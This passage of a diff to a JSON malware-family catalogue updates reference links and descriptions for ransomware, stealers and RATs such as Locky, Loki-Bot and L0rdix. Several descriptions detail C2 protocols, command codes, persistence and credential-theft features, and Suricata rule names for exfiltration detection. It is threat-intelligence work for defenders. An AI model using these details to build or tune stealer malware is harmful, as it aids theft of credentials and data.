as the Windows Boot Manager.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lockergoga", "https://www.nrk.no/norge/skreddersydd-dobbeltangrep-mot-hydro-1.14480202", - "https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html", + "https://www.govcert.admin.ch/blog/36/severe-ransomware-attacks-against-swiss-smes", + "https://dragos.com/wp-content/uploads/Spyware-Stealer-Locker-Wiper-LockerGoga-Revisited.pdf", "https://www.abuse.io/lockergoga.txt", + "https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html", + "https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html", + "https://content.fireeye.com/m-trends/rpt-m-trends-2020", + "https://www.bleepingcomputer.com/news/security/fbi-issues-alert-for-lockergoga-and-megacortex-ransomware/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", "https://doublepulsar.com/how-lockergoga-took-down-hydro-ransomware-used-in-targeted-attacks-aimed-at-big-business-c666551f5880", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf", "https://www.youtube.com/watch?v=o6eEN0mUakM", + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", "https://www.helpnetsecurity.com/2019/04/02/aurora-decrypter-mira-decrypter/", - "https://www.bleepingcomputer.com/news/security/new-lockergoga-ransomware-allegedly-used-in-altran-attack/" + "https://www.bleepingcomputer.com/news/security/new-lockergoga-ransomware-allegedly-used-in-altran-attack/", + "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/" ], "synonyms": [], "type": [] @@ -10888,18 +20117,30 @@ "value": "LockerGoga" }, { - "description": "", + "description": "Locky is a high profile ransomware family that first appeared in early 2016 and was observed being active until end of 2017. It encrypts files on the victim system and asks for ransom in order to have back original files. In its first version it added a .locky extension to the encrypted files, and in recent versions it added the .lukitus extension. The ransom amount is defined in BTC and depends on the actor.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.locky", "http://securityaffairs.co/wordpress/49094/malware/zepto-ransomware.html", + "https://blog.malwarebytes.com/threat-analysis/2016/03/look-into-locky/", + "https://www.bleepingcomputer.com/news/security/locky-ransomware-returns-but-targets-only-windows-xp-and-vista/", + "https://dissectingmalwa.re/picking-locky.html", + "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/", + "http://blog.talosintelligence.com/2017/06/necurs-locky-campaign.html", + "https://thisissecurity.stormshield.com/2018/03/20/de-obfuscating-jump-chains-with-binary-ninja/", + "http://web.archive.org/web/20181007211751/https://myonlinesecurity.co.uk/return-of-fake-ups-cannot-deliver-malspam-with-an-updated-nemucod-ransomware-and-kovter-payload/", + "https://blog.botfrei.de/2017/08/weltweite-spamwelle-verbreitet-teufliche-variante-des-locky/", + "https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process", + "https://threatpost.com/ransomware-gang-arrested-locky-hospitals/155842/", + "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/", + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf", + "https://vixra.org/pdf/2002.0183v1.pdf", "https://blog.malwarebytes.com/threat-analysis/2017/01/locky-bart-ransomware-and-backend-server-analysis/", "https://www.bleepingcomputer.com/news/security/locky-ransomware-switches-to-the-lukitus-extension-for-encrypted-files/", - "http://blog.talosintelligence.com/2017/06/necurs-locky-campaign.html", - "https://blog.botfrei.de/2017/08/weltweite-spamwelle-verbreitet-teufliche-variante-des-locky/", - "https://www.bleepingcomputer.com/news/security/locky-ransomware-returns-but-targets-only-windows-xp-and-vista/", - "https://blog.malwarebytes.com/threat-analysis/2016/03/look-into-locky/", - "https://www.cylance.com/en_us/blog/threat-spotlight-locky-ransomware.html" + "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", + "https://www.cylance.com/en_us/blog/threat-spotlight-locky-ransomware.html", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf" ], "synonyms": [], "type": [] @@ -10947,14 +20188,18 @@ "value": "LockPOS" }, { - "description": "Loda is a previously undocumented AutoIT malware with a variety of capabilities for spying on victims. Proofpoint first observed Loda in September of 2016 and it has since grown in popularity. The name Loda is derived from a directory to which the malware author chose to write keylogger logs. It should be noted that some antivirus products currently detect Loda as “Trojan.Nymeria”, although the connection is not well-documented.", + "description": "Loda is a previously undocumented AutoIT malware with a variety of capabilities for spying on victims. Proofpoint first observed Loda in September of 2016 and it has since grown in popularity. The name Loda is derived from a directory to which the malware author chose to write keylogger logs. It should be noted that some antivirus products currently detect Loda as \u201cTrojan.Nymeria\u201d, although the connection is not well-documented.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.loda", + "https://blog.talosintelligence.com/2020/02/loda-rat-grows-up.html", "https://www.proofpoint.com/us/threat-insight/post/introducing-loda-malware", + "https://blog.talosintelligence.com/2020/09/lodarat-update-alive-and-well.html", + "https://blog.talosintelligence.com/2021/02/kasablanka-lodarat.html", "https://zerophagemalware.com/2018/01/23/maldoc-rtf-drop-loda-logger/" ], "synonyms": [ + "LodaRAT", "Nymeria" ], "type": [] @@ -10962,6 +20207,26 @@ "uuid": "8098d303-cb5f-4eff-b62e-96bb5ef4329f", "value": "Loda" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.lodeinfo", + "https://www.cyberandramen.net/2020/06/analysis-of-lodeinfo-maldoc.html", + "https://blogs.jpcert.or.jp/en/2021/02/LODEINFO-3.html", + "https://blogs.jpcert.or.jp/ja/2020/06/LODEINFO-2.html", + "https://securelist.com/apt-trends-report-q3-2020/99204/", + "https://www.macnica.net/file/mpressioncss_ta_report_2019_4.pdf", + "https://twitter.com/jpcert_ac/status/1351355443730255872", + "https://www.macnica.net/pdf/mpressioncss_ta_report_2019_4_en.pdf", + "https://blogs.jpcert.or.jp/ja/2020/02/LODEINFO.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "9429e1b3-31fb-4e52-ad78-e3d377f10fcb", + "value": "LODEINFO" + }, { "description": "", "meta": { @@ -10993,6 +20258,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lojax", + "https://symantec-blogs.broadcom.com/blogs/election-security/apt28-espionage-military-government", + "https://www.youtube.com/watch?v=VeoXT0nEcFU", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", "https://www.welivesecurity.com/wp-content/uploads/2018/09/ESET-LoJax.pdf" ], "synonyms": [], @@ -11002,23 +20270,40 @@ "value": "LoJax" }, { - "description": "\"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets.\" - PhishMe\r\n\r\nLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.\r\n\r\nLoki-Bot accepts a single argument/switch of ‘-u’ that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.\r\n\r\nThe Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: “B7E1C2CC98066B250DDB2123“.\r\n\r\nLoki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: “%APPDATA%\\ C98066\\”.\r\n\r\nThere can be four files within the hidden %APPDATA% directory at any given time: “.exe,” “.lck,” “.hdb” and “.kdb.” They will be named after characters 13 thru 18 of the Mutex. For example: “6B250D.” Below is the explanation of their purpose:\r\n\r\nFILE EXTENSION\tFILE DESCRIPTION\r\n.exe\tA copy of the malware that will execute every time the user account is logged into\r\n.lck\tA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts\r\n.hdb\tA database of hashes for data that has already been exfiltrated to the C2 server\r\n.kdb\tA database of keylogger data that has yet to be sent to the C2 server\r\n\r\nIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.\r\n\r\nThe first packet transmitted by Loki-Bot contains application data.\r\n\r\nThe second packet transmitted by Loki-Bot contains decrypted Windows credentials.\r\n\r\nThe third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.\r\n\r\nCommunications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.\r\n\r\nThe first WORD of the HTTP Payload represents the Loki-Bot version.\r\n\r\nThe second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:\r\n\r\nBYTE\tPAYLOAD TYPE\r\n0x26\tStolen Cryptocurrency Wallet\r\n0x27\tStolen Application Data\r\n0x28\tGet C2 Commands from C2 Server\r\n0x29\tStolen File\r\n0x2A\tPOS (Point of Sale?)\r\n0x2B\tKeylogger Data\r\n0x2C\tScreenshot\r\n\r\nThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically “ckav.ru”. If you come across a Binary ID that is different from this, take note!\r\n\r\nLoki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.\r\n\r\nThe Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bot’s C2 infrastructure.\r\n\r\nLoki-Bot can accept the following instructions from the C2 Server:\r\n\r\nBYTE\tINSTRUCTION DESCRIPTION\r\n0x00\tDownload EXE & Execute\r\n0x01\tDownload DLL & Load #1\r\n0x02\tDownload DLL & Load #2\r\n0x08\tDelete HDB File\r\n0x09\tStart Keylogger\r\n0x0A\tMine & Steal Data\r\n0x0E\tExit Loki-Bot\r\n0x0F\tUpgrade Loki-Bot\r\n0x10\tChange C2 Polling Frequency\r\n0x11\tDelete Executables & Exit\r\n\r\nSuricata Signatures\r\nRULE SID\tRULE NAME\r\n2024311\tET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected\r\n2024312\tET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M1\r\n2024313\tET TROJAN Loki Bot Request for C2 Commands Detected M1\r\n2024314\tET TROJAN Loki Bot File Exfiltration Detected\r\n2024315\tET TROJAN Loki Bot Keylogger Data Exfiltration Detected M1\r\n2024316\tET TROJAN Loki Bot Screenshot Exfiltration Detected\r\n2024317\tET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M2\r\n2024318\tET TROJAN Loki Bot Request for C2 Commands Detected M2\r\n2024319\tET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2", + "description": "\"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets.\" - PhishMe\r\n\r\nLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.\r\n\r\nLoki-Bot accepts a single argument/switch of \u2018-u\u2019 that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.\r\n\r\nThe Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: \u201cB7E1C2CC98066B250DDB2123\u201c.\r\n\r\nLoki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: \u201c%APPDATA%\\ C98066\\\u201d.\r\n\r\nThere can be four files within the hidden %APPDATA% directory at any given time: \u201c.exe,\u201d \u201c.lck,\u201d \u201c.hdb\u201d and \u201c.kdb.\u201d They will be named after characters 13 thru 18 of the Mutex. For example: \u201c6B250D.\u201d Below is the explanation of their purpose:\r\n\r\nFILE EXTENSION\tFILE DESCRIPTION\r\n.exe\tA copy of the malware that will execute every time the user account is logged into\r\n.lck\tA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts\r\n.hdb\tA database of hashes for data that has already been exfiltrated to the C2 server\r\n.kdb\tA database of keylogger data that has yet to be sent to the C2 server\r\n\r\nIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.\r\n\r\nThe first packet transmitted by Loki-Bot contains application data.\r\n\r\nThe second packet transmitted by Loki-Bot contains decrypted Windows credentials.\r\n\r\nThe third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.\r\n\r\nCommunications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.\r\n\r\nThe first WORD of the HTTP Payload represents the Loki-Bot version.\r\n\r\nThe second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:\r\n\r\nBYTE\tPAYLOAD TYPE\r\n0x26\tStolen Cryptocurrency Wallet\r\n0x27\tStolen Application Data\r\n0x28\tGet C2 Commands from C2 Server\r\n0x29\tStolen File\r\n0x2A\tPOS (Point of Sale?)\r\n0x2B\tKeylogger Data\r\n0x2C\tScreenshot\r\n\r\nThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically \u201cckav.ru\u201d. If you come across a Binary ID that is different from this, take note!\r\n\r\nLoki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.\r\n\r\nThe Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bot\u2019s C2 infrastructure.\r\n\r\nLoki-Bot can accept the following instructions from the C2 Server:\r\n\r\nBYTE\tINSTRUCTION DESCRIPTION\r\n0x00\tDownload EXE & Execute\r\n0x01\tDownload DLL & Load #1\r\n0x02\tDownload DLL & Load #2\r\n0x08\tDelete HDB File\r\n0x09\tStart Keylogger\r\n0x0A\tMine & Steal Data\r\n0x0E\tExit Loki-Bot\r\n0x0F\tUpgrade Loki-Bot\r\n0x10\tChange C2 Polling Frequency\r\n0x11\tDelete Executables & Exit\r\n\r\nSuricata Signatures\r\nRULE SID\tRULE NAME\r\n2024311\tET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected\r\n2024312\tET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M1\r\n2024313\tET TROJAN Loki Bot Request for C2 Commands Detected M1\r\n2024314\tET TROJAN Loki Bot File Exfiltration Detected\r\n2024315\tET TROJAN Loki Bot Keylogger Data Exfiltration Detected M1\r\n2024316\tET TROJAN Loki Bot Screenshot Exfiltration Detected\r\n2024317\tET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M2\r\n2024318\tET TROJAN Loki Bot Request for C2 Commands Detected M2\r\n2024319\tET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws", "https://isc.sans.edu/diary/24372", - "https://github.com/R3MRUM/loki-parse", "http://www.malware-traffic-analysis.net/2017/06/12/index.html", - "https://www.lastline.com/blog/password-stealing-malware-loki-bot/", - "https://blog.fortinet.com/2017/05/17/new-loki-variant-being-spread-via-pdf-file", - "http://blog.fernandodominguez.me/lokis-antis-analysis/", - "https://phishme.com/loki-bot-malware/", - "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/", + "https://www.proofpoint.com/us/blog/threat-insight/commodity-net-packers-use-embedded-images-hide-payloads", + "https://resources.malwarebytes.com/files/2020/05/CTNT_Q1_2020_COVID-Report_Final.pdf", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/evasive-urls-in-spam-part-2/", + "https://github.com/R3MRUM/loki-parse", "https://r3mrum.wordpress.com/2017/05/07/loki-bot-atrifacts/", - "https://securelist.com/loki-bot-stealing-corporate-passwords/87595/", "https://cysinfo.com/nefarious-macro-malware-drops-loki-bot-across-gcc-countries/", + "https://www.sans.org/reading-room/whitepapers/malicious/loki-bot-information-stealer-keylogger-more-37850", + "https://blog.fortinet.com/2017/05/17/new-loki-variant-being-spread-via-pdf-file", + "https://blog.yoroi.company/research/aggah-how-to-run-a-botnet-without-renting-a-server-for-more-than-a-year/", + "https://www.virusbulletin.com/virusbulletin/2020/02/lokibot-dissecting-cc-panel-deployments/", + "https://medium.com/@paul.k.burbage/the-tale-of-the-pija-droid-firefinch-4d304fde5ca2", + "https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter", + "https://blog.talosintelligence.com/2019/07/sweed-agent-tesla.html", + "https://lab52.io/blog/a-twisted-malware-infection-chain/", + "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", + "https://news.sophos.com/en-us/2020/05/14/raticate/", "https://github.com/d00rt/hijacked_lokibot_version/blob/master/doc/LokiBot_hijacked_2018.pdf", - "https://www.sans.org/reading-room/whitepapers/malicious/loki-bot-information-stealer-keylogger-more-37850" + "https://blog.talosintelligence.com/2021/01/a-deep-dive-into-lokibot-infection-chain.html", + "https://clickallthethings.wordpress.com/2020/03/31/lokibot-getting-equation-editor-shellcode/", + "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/loki-info-stealer-propagates-through-lzh-files", + "https://blog.prevailion.com/2020/02/the-triune-threat-mastermana-returns.html", + "https://www.lastline.com/blog/password-stealing-malware-loki-bot/", + "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/", + "https://research.checkpoint.com/2019/select-code_execution-from-using-sqlite/", + "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko", + "https://marcoramilli.com/2019/10/28/sweed-targeting-precision-engineering-companies-in-italy/", + "https://phishme.com/loki-bot-malware/", + "https://securelist.com/loki-bot-stealing-corporate-passwords/87595/" ], "synonyms": [ "Loki", @@ -11034,20 +20319,106 @@ "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.lordix", - "https://twitter.com/hexlax/status/1058356670835908610" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.lolsnif", + "https://medium.com/@vishal_thakur/lolsnif-malware-e6cb2e731e63", + "https://research.checkpoint.com/2020/gozi-the-malware-with-a-thousand-faces/", + "https://thedfirreport.com/2020/04/24/ursnif-via-lolbins/", + "https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/", + "https://www.telekom.com/en/blog/group/article/lolsnif-tracking-another-ursnif-based-targeted-campaign-600062" ], "synonyms": [], "type": [] }, + "uuid": "397bfb34-5643-4d21-a5b1-6950750fb89f", + "value": "LOLSnif" + }, + { + "description": "The primary function of LONGWATCH is a keylogger that outputs keystrokes to a log.txt file in the Windows temp folder.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.longwatch", + "https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "08106bd2-975b-421c-8794-366452fb0109", + "value": "LONGWATCH" + }, + { + "description": "LooChiper is a Ransomware. It uses a nice but scary name: LooCipher. The name is at the same time an allusion to its capabilities (thank to the term \u201cCipher\u201d) and to the popular mythological figure, Lucifer. Despite its evocative nickname, the functionalities of this malware are pretty straight forward, not very different from those belonging to many other ransomware families. ", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.loochiper", + "https://github.com/ZLab-Cybaze-Yoroi/LooCipher_Decryption_Tool", + "https://marcoramilli.com/2019/07/13/free-tool-loocipher-decryptor/", + "https://blog.yoroi.company/research/loocipher-the-new-infernal-ransomware/", + "https://www.fortinet.com/blog/threat-research/loocipher-can-encrypted-files-be-recovered.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "4b83ba50-7d50-48b4-bb70-fcbcacd23340", + "value": "looChiper Ransomware" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.lookback", + "https://threatgen.com/taking-a-closer-look-at-the-lookback-malware-campaign-part-1/", + "https://nao-sec.org/2021/01/royal-road-redive.html", + "https://pylos.co/wp-content/uploads/2020/02/Threat-Intelligence-and-the-Limits-of-Malware-Analysis.pdf", + "https://www.proofpoint.com/us/threat-insight/post/lookback-forges-ahead-continued-targeting-united-states-utilities-sector-reveals", + "https://www.proofpoint.com/us/threat-insight/post/lookback-malware-targets-united-states-utilities-sector-phishing-attacks", + "https://www.proofpoint.com/us/blog/threat-insight/ta410-group-behind-lookback-attacks-against-us-utilities-sector-returns-new", + "https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape" + ], + "synonyms": [], + "type": [] + }, + "uuid": "bb038b04-622b-4df6-b867-601284e8da0e", + "value": "Lookback" + }, + { + "description": "L0rdix is a multipurpose .NET remote access tool (RAT) first discovered being sold on underground forums in November 2018. Out of the box, L0rdix supports eight commands, although custom commands can be defined and added. These include:\r\n\r\nDownload and execute\r\nUpdate\r\nOpen page (visible)\r\nOpen page (invisible)\r\nCmd\r\nKill process\r\nUpload file\r\nHTTP Flood\r\n\r\nL0rdix can extract credentials from common web browsers and steal data from crypto wallets and a target's clipboard. Optionally, L0rdix can deploy a cryptominer (XMRig) to its bots.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.lordix", + "https://twitter.com/hexlax/status/1058356670835908610", + "https://github.com/cryptogramfan/Malware-Analysis-Scripts/blob/master/decrypt_l0rdix_c2.py", + "https://www.bromium.com/an-analysis-of-l0rdix-rat-panel-and-builder/", + "https://www.bromium.com/decrypting-l0rdix-rats-c2/", + "https://blog.ensilo.com/l0rdix-attack-tool" + ], + "synonyms": [ + "lordix" + ], + "type": [] + }, "uuid": "fa61a690-fd9c-4036-97fb-bf3674aa60b2", - "value": "Lordix" + "value": "L0rdix" + }, + { + "description": "Frank Boldewin describes Loup as a small cli-tool to cash out NCR devices (ATM).", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.loup", + "https://twitter.com/Arkbird_SOLG/status/1295396936896438272", + "https://twitter.com/r3c0nst/status/1295275546780327936" + ], + "synonyms": [], + "type": [] + }, + "uuid": "8ab39736-68f4-4b51-9b48-7034da1cac71", + "value": "Loup" }, { "description": "LOWBALL, uses the legitimate Dropbox cloud-storage\r\nservice to act as the CnC server. It uses the Dropbox API with a hardcoded bearer access token and has the ability to download, upload, and execute files. The communication occurs via HTTPS over port 443.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lowball", + "https://kindredsec.com/2019/08/12/an-overview-of-public-platform-c2s/", "https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html" ], "synonyms": [], @@ -11060,18 +20431,52 @@ "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.luminosity_rat", - "http://malwarenailed.blogspot.com/2016/07/luminosity-rat-re-purposed.html", - "https://researchcenter.paloaltonetworks.com/2018/02/unit42-rat-trapped-luminositylink-falls-foul-vermin-eradication-efforts/", - "https://researchcenter.paloaltonetworks.com/2016/07/unit42-investigating-the-luminositylink-remote-access-trojan-configuration/", - "https://krebsonsecurity.com/2018/07/luminositylink-rat-author-pleads-guilty/", - "https://umbrella.cisco.com/blog/2017/01/18/finding-the-rats-nest/", - "https://www.proofpoint.com/us/threat-insight/post/Light-After-Dark", - "https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.lowkey", + "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Winnti.pdf", + "https://www.welivesecurity.com/2019/10/21/winnti-group-skip2-0-microsoft-sql-server-backdoor/", + "https://www.fireeye.com/blog/threat-research/2019/10/lowkey-hunting-for-the-missing-volume-serial-id.html" + ], + "synonyms": [ + "PortReuse" + ], + "type": [] + }, + "uuid": "515d1318-c3b1-4d40-a321-31b3baf75414", + "value": "LOWKEY" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.lucifer", + "https://research.checkpoint.com/2020/rudeminer-blacksquid-and-lucifer-walk-into-a-bar/", + "https://unit42.paloaltonetworks.com/lucifer-new-cryptojacking-and-ddos-hybrid-malware/" ], "synonyms": [], "type": [] }, + "uuid": "54093130-035f-4f2c-b98c-a660156fbbda", + "value": "Lucifer" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.luminosity_rat", + "https://krebsonsecurity.com/2018/07/luminositylink-rat-author-pleads-guilty/", + "https://researchcenter.paloaltonetworks.com/2018/02/unit42-rat-trapped-luminositylink-falls-foul-vermin-eradication-efforts/", + "https://researchcenter.paloaltonetworks.com/2016/07/unit42-investigating-the-luminositylink-remote-access-trojan-configuration/", + "http://malwarenailed.blogspot.com/2016/07/luminosity-rat-re-purposed.html", + "https://umbrella.cisco.com/blog/2017/01/18/finding-the-rats-nest/", + "https://www.proofpoint.com/us/threat-insight/post/Light-After-Dark", + "https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf", + "https://www.secureworks.com/research/threat-profiles/copper-fieldstone" + ], + "synonyms": [ + "LuminosityLink" + ], + "type": [] + }, "uuid": "e145863e-f3bd-489c-91f6-0c2b7e9cc59a", "value": "Luminosity RAT" }, @@ -11135,12 +20540,28 @@ }, { "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.m00nd3v", + "https://www.zscaler.com/blogs/research/deep-dive-m00nd3v-logger" + ], + "synonyms": [], + "type": [] + }, + "uuid": "737a73d5-40a2-4779-a84b-bdbefd1af4c9", + "value": "M00nD3V Logger" + }, + { + "description": "According to ESET, Machete\u2019s dropper is a RAR SFX executable. Three py2exe components are dropped: GoogleCrash.exe, Chrome.exe and GoogleUpdate.exe. A single configuration file, jer.dll, is dropped, and it contains base64\u2011encoded text that corresponds to AES\u2011encrypted strings.\r\nGoogleCrash.exe is the main component of the malware. It schedules execution of the other two components and creates Windows Task Scheduler tasks to achieve persistence.\r\nRegarding the geolocation of victims, Chrome.exe collects data about nearby Wi-Fi networks and sends it to the Mozilla Location Service API. In short, this application provides geolocation coordinates when it\u2019s given other sources of data such as Bluetooth beacons, cell towers or Wi-Fi access points. Then the malware takes latitude and longitude coordinates to build a Google Maps URL.\r\nThe GoogleUpdate.exe component is responsible for communicating with the remote C&C server. The configuration to set the connection is read from the jer.dll file: domain name, username and password. The principal means of communication for Machete is via FTP, although HTTP communication was implemented as a fallback in 2019.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.machete", + "https://static1.squarespace.com/static/5a01100f692ebe0459a1859f/t/5da340ded5ccf627e1764059/1570980068506/Day3-1130-Green-A+study+of+Machete+cyber+espionage+operations+in+Latin+America.pdf", "https://securelist.com/el-machete/66108/", + "https://medium.com/@verovaleros/el-machete-what-do-we-know-about-the-apt-targeting-latin-america-be7d11e690e6", + "https://threatvector.cylance.com/en_us/home/threat-spotlight-machete-info-stealer.html", "https://www.cylance.com/en_us/blog/el-machete-malware-attacks-cut-through-latam.html", - "https://medium.com/@verovaleros/el-machete-what-do-we-know-about-the-apt-targeting-latin-america-be7d11e690e6" + "https://www.welivesecurity.com/2019/08/05/sharpening-machete-cyberespionage/" ], "synonyms": [ "El Machete" @@ -11154,8 +20575,7 @@ "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.madmax", - "https://www.arbornetworks.com/blog/asert/mad-max-dga/" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.madmax" ], "synonyms": [], "type": [] @@ -11182,8 +20602,10 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.magniber", "https://blog.malwarebytes.com/threat-analysis/2017/10/magniber-ransomware-exclusively-for-south-koreans/", + "https://medium.com/coinmonks/passive-income-of-cyber-criminals-dissecting-bitcoin-multiplier-scam-b9d2b6048372", "https://www.youtube.com/watch?v=lqWJaaofNf4", - "http://asec.ahnlab.com/1124" + "http://asec.ahnlab.com/1124", + "https://asec.ahnlab.com/en/19273/" ], "synonyms": [], "type": [] @@ -11191,12 +20613,70 @@ "uuid": "fedac411-0638-48dc-8ac5-1b4171fa8a29", "value": "Magniber" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mailto", + "https://id-ransomware.blogspot.com/2019/09/koko-ransomware.html", + "https://sites.temple.edu/care/ci-rw-attacks/", + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/take-a-netwalk-on-the-wild-side/", + "https://danusminimus.github.io/Zero2Auto-Netwalker-Walkthrough/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/netwalker-fileless-ransomware-injected-via-reflective-loading/", + "https://www.youtube.com/watch?v=q8of74upT_g", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/an-in-depth-look-at-mailto-ransomware-part-two-of-three/", + "https://www.ic3.gov/media/news/2020/200929-2.pdf", + "https://www.advanced-intel.com/post/netwalker-ransomware-group-enters-advanced-targeting-game", + "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", + 